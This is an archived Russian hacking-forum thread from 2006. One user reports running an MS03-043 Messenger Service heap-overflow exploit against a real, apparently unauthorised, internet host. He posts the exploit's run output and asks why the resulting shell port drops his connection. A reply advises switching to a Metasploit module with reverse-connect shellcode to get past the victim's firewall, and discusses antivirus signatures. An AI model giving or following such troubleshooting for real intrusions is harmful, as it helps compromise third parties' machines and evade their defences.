Sos! [Архив] - Форум АНТИЧАТ

Просмотр полной версии : Sos!

GeyDee

27.08.2006, 03:17

Привет всем онлайновским перцам! У меня небольшая проблемка, в которой я прошу помочь мне разобраться. Значит так! Нарыл я в инете одну дырявую тачку. Уязвимость Microsoft RPS (ms03-043).
на 135 порту. Залил сплойт. После этого мона было подконнектиться к порту 9191, но когда я начинал тельнетиться к этому порту, соединение сбрасывалось.

Вот небольшой листинг, так сказать, моего сплойта, которого я запаивал при его запуске.

C:\Windows\remote.exe

-=[MS Messenger Service Heap Overflow Exploit (ms03-43) ver 0.7]=-

by Adik <netmaniac [at] hotmail.kg>
http://netninja.to.kg

Target OS version:

[0] Windows 2000 SP 3 <en>
[1] Windows XP SP 1 <en>

Usage: remote.exe [TargetIP] [ver: 0 :1]
eg: msgr.exe 192.168.63.130 0

C:\Windows

А вот этот после соотвествующих действий:

C:\Windows\remote.exe

-=[ MS Messenger Service Heap Overflow Ex by Adik
<netmaniac [at] hotmail.KG >
http://netninja.to.kg

Target: IP: 85.192.128.18

UEF: 0x77ed73b4

JMP: 0x7804bf52

WSAStartup initialized...

Msg body size: 3600

Socket initialized...

Injecting packet into a remote proces

Packet injected...
[i] Try connecting to 85.192.128.18:9191

Помогите разобраться. :)

guest3297

27.08.2006, 03:36

TELNET 85.192.128.18:9191
или юзай putty

GeyDee

27.08.2006, 12:01

Да в том то и дело! Когда начинаю тельнетиться, соединение сначала идет, а потом секунд ч-з 10 сбрасывается!

Telnet 85.192.128.18:9191
Connecting 85.192.128.18. . .
Не удается установить соединение с 85.192.128.18 на порт 9191. Сбой подключения.

HELP!
-------------------------------------------------------------------

Говори кратко, проси мало, уходи быстро и больше не вспоминай о чем попросил...

Elekt

27.08.2006, 12:19

Ну вроде всё правильно, если эксплоит рабочий.

Можно попробовать заюзать аналогичный сплоит в метасплоите. Там точно был под виндовый месенджер. И в качестве шелкода использовать не бинд порта, а бэкконнект. Тогда поганый виндовый фаервол не будет помехой(хотя я уже не помню, был ли в 1 СП фаер. вроде был). Он скорее всего и мешает.

Но тут ещё вот в чём фича. Если у жертвы стоит Аутпост, или Касперский 5 и выше, то там есть в базах сигнатура этого сплоита. И уязвимость может существовать, но заюзать её могут помешать.

Так что, думаю не судьба. такое бывает.

GeyDee

27.08.2006, 15:19

Elekt
Пасиб конечно за развернутый ответ. Сплойт рабочий, по крайней мере сливал с разный паг два раза. Сплойт должен быть рабочий! Но я попробую ч-з бэконнект, посмотрю, что из этого выйдет.
Пробовал другие сплойты связанные с уязвимостью RPC на 135 порту, тоже такая же батва. Уже голову сломал.
Может еще что-нить подскажет?

GeyDee

29.08.2006, 23:01

Темку можно крыть. Все вопросы решены.